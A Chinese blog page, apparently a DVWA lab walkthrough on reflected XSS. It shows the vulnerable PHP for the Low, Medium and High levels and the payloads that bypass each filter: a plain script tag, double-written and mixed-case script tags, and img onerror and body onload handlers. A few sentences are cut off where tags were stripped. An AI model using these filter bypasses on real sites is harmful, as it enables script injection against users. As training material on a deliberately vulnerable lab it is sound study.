XSS(Reflected)

最新推荐文章于 2023-06-19 22:21:47 发布
最新推荐文章于 2023-06-19 22:21:47 发布
阅读量201 收藏
点赞数
分类专栏: DVWA
本文链接:https://blog.csdn.net/curryzzb/article/details/116030529
版权

XSS(Reflected):

  • XSS全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行

Low:

源代码:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>
  • array_key_exists --------检查数组里是否有指定的键名或索引,在name中检查是否有$_GET,
  • 代码中并没有对name参数进行任何限制

方法:直接在输入框中输入语句:

<script>alert(/xss/)</script>

Medium:

源代码:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

代码中,将

方法一:可以将

<scr<script>ipt>alert('xss')</scr<script>ipt>

方法二:代码中并没有对大小写进行过滤,可以使用大小写混淆进行绕过

<ScRipt>alert('xss')</script>

High:

源代码:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

代码分析:preg_replace函数的使用,正则表达式的搜索和替换

  • 如果在修饰符中加上"i",则正则将会取消大小写敏感性
  • /m 多行匹配,在出现换行符%0a的时候,会被当成两行处理,只能匹配第一行
  • /e 无限制传参,
  • 本关中,双写绕过、大小写混淆绕过(正则表达式中i表示不区分大小写)不再有效。
  • preg_replace函数的参考原文

方法:虽然无法使用

如img,body等标签的事件进行注入恶意的js代码

<img src=1 οnerrοr=alert(/xss/)>

<body οnlοad=alert("xss")>
Оrdsh1ne
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【DVWA】--- 九、反射型XSS(XSS Reflected)
qq_43168364的博客
05-31 680
XSS Reflected 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 这里输入的内容会回显出来 构造js代码:<script>alert(/hack/)</script>,会出现弹窗 此时前端的html中已经有我们插入的代码了 但是当我们再点击以下改模块时里面的代码就会消失,这就是反射型的XSS它时临时的 代码审计 header(“X-XSS-Protection: 0”):X-XSS-Prot
二、详解 DVWA_Reflected反射型XSS
在下小黄的博客
05-23 1062
第二篇、详解 DVWA_Reflected反射型XSS
dvwa详解_DVWA(六):XSS-Reflected 反射型XSS全等级详解
weixin_42234804的博客
01-26 455
XSS 概念:由于web应用程序对用户的输入过滤不严,通过html注入篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。XSS类型:Reflected(反射型):只是简单的把用户输入的数据反射给浏览器,需要诱导用户点击一个恶意链接才能攻击成功。存储型:将用户输入的数据存储在服务器端,每次用户访问都会被执行js脚本DOM型:文本对象模式xss,通过修改页面的DOM节点形成的XS...
XSS漏洞
weixin_50340347的博客
06-19 649
xss(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面插入恶意JS代码,这些代码在HTML解释时会被当做脚本执行,所以当用户请求该网页时,嵌入其中JS代码就会被执行,从而达到攻击的目的.
论文研究-基于浏览器的Reflected XSS防御系统:XSS-Defender .pdf
08-14
基于浏览器的Reflected XSS防御系统:XSS-Defender,万本钰,辛阳,随着Web 2.0时代的到来,XSS(跨站脚本)攻击产生的安全威胁日益显著。XSS攻击具有双重特点:容易被忽略且安全危害严重。而现有的XSS��
DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie的利用过程演示
weixin_46709219的博客
01-25 1万+
一)XSS(Reflected)介绍: 反射型xss(非持久型):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器中执行。 通过Web站点漏洞,向客户交付恶意脚本代码,实现对客户端的攻击;恶意攻击者往Web页面里插入恶意的 Script 代码,当用户浏览该页面时,嵌入其中 Web 里面的 Script 代码就会被执行,从而达到恶意攻击用户的目的;注入客户端脚本代码、盗取cookie、重定向等。 二)实际
[网络安全]DVWA之XSS(Reflected)攻击姿势及解题详析合集
热门推荐
等风来
05-17 1万+
Payload:alert("qiu")由于str_replace() 函数将标签替换为空,且str_replace函数仅执行一次Payload将变为alert("qiu"),从而实现了正常XSS语句的注入在 PHP 中,变量名、函数名、常量名等标识符都是区分大小写的。 例如,$Qiu 和 $qiu 是两个不同的变量因此我们可构造Payload如下来绕过限制:Payload:alert("
XSS(Reflected) 反射型跨站攻击
manok的专栏
11-05 2178
今天我学习一下反射型XSS。 打开DVWA网站,先切换到low级别,选择XSS(Reflected) 先查看其源代码: <?php header("X-XSS-Protection:0");//Isthereanyinput?if(array_key_exists("name",$_GET)&&$_GET['name']!=...
DVWA-XSS (Reflected)-反射型XSS
seanyang_的博客
06-12 2718
XSS攻击,是指攻击者在Web页面中输入恶意的JavaScript脚本,而Web应用程序没有对用户的输入进行过滤或处理就直接执行,将结果输出在网页中。如果恶意JavaScript脚本被存储到后端服务器中,用户打开该Web页面时,恶意脚本则可能在浏览器中自动执行。XSS攻击依赖于JavaScript脚本的执行。一般,攻击者插入恶意脚本后,需要将脚本执行结果显示出来,因此,XSS攻击常见于网站中有用户输入且能够显示的地方,如文章发表、评论回复、留言板等。
Testing for reflected XSS using Burp Repeater.pdf
07-06
• 使用 Burp Repeater 的搜索和自动滚动功能快速识别响应中反射输入。...• 识别和利用一个基本的反射型 XSS 漏洞。 • 在浏览器中重放来自 Burp Repeater 的请求,以从受害者的角度查看您的攻击。
JSP过滤器防止Xss漏洞的实现方法(分享)
01-08
在用java进行web业务开发的时候,对于页面上接收到的参数,除了极少数是步可预知的内容外,大量的参数名和参数值都是不会出现触发Xss漏洞的字符。而通常为了避免Xss漏洞,都是开发人员各自在页面输出和数据入库等...
Web应用安全:XSS盗取cookiepayload(实验习题).docx
06-17
Web应用安全:XSS盗取cookiepayload(实验习题).docx
Node-React-JWT-Authentication-with-reflected-XSS
04-07
带有反射XSS的节点/React,JSON Web令牌(JWT)身份验证这是一个小型的Web应用程序,旨在显示我对Node.js和React的理解。设置: 登录到您的:' mysql -u root -p 创建所需的数据库testdb : create database testdb;...
DVWA--反射型XSS(Reflected)攻略详解
Silver_lion的博客
08-13 5984
目录 Low等级 Low等级 输入<script>alert(/xss/)</script>测试漏洞,成功弹框 注:可以弹窗的函数有alert(),confirm(),prompt()
反射型XSS(Reflected)DVWA全等级绕过方法
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
11-30 3773
本站所有文章均为原创,欢迎转载,请注明文章出处[https://blog.csdn.net/weixin_43847838/article/details/110358618](https://blog.csdn.net/weixin_43847838/article/details/110358618).。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。
DVWA 之 XSS(Reflected)反射型XSS
RexHa的博客
10-07 1959
dvwa 反射型XSS
XSS(Reflected)
kid的博客
05-03 3221
XSS(Reflected) 前言 前面已经对xss存储型进行了练习,有了初步的认识 这里结合dvwa靶场对xss反射型漏洞来进行一个初步的学习 练习 Low 进入xss反射型练习,可以看到这里是我们输入什么后,下面就会输出Hello+我们的输入 OK,直接来试下<script>alert(1)</script> 可以看到1成功弹出,说明存在很简单(没有任何防护)的xs...
Reflected XSS All Clients漏洞修复
Hhhh_cccc的博客
05-13 8542
package com.smartcity.util; import org.apache.poi.ss.formula.functions.T; import org.owasp.esapi.codecs.MySQLCodec; /** * @author allen smith * @date 2020-04-27 0027 11:18 */ public class ESAPI { private static ESAPI instance = new ESAPI(); .
led-Opt.Bak
最新发布
05-21
毕设&课设&项目&实训- 【项目资源】: 包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。 包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】: 所有源码都经过严格测试,可以直接运行。 功能在确认正常工作后才上传。 【适用人群】: 适用于希望学习不同技术领域的小白或进阶学习者。 可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】: 项目具有较高的学习借鉴价值,也可直接拿来修改复刻。 对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】: 有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。 鼓励下载和使用,并欢迎大家互相学习,共同进步。
dvwa xss reflected
03-16
DVWA是一个漏洞演示平台,其中包含了多种漏洞类型,其中包括XSS反射漏洞。XSS反射漏洞是一种常见的Web漏洞,攻击者可以通过在URL参数或表单输入中注入恶意脚本,从而在用户浏览网页时执行恶意代码,例如窃取用户的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值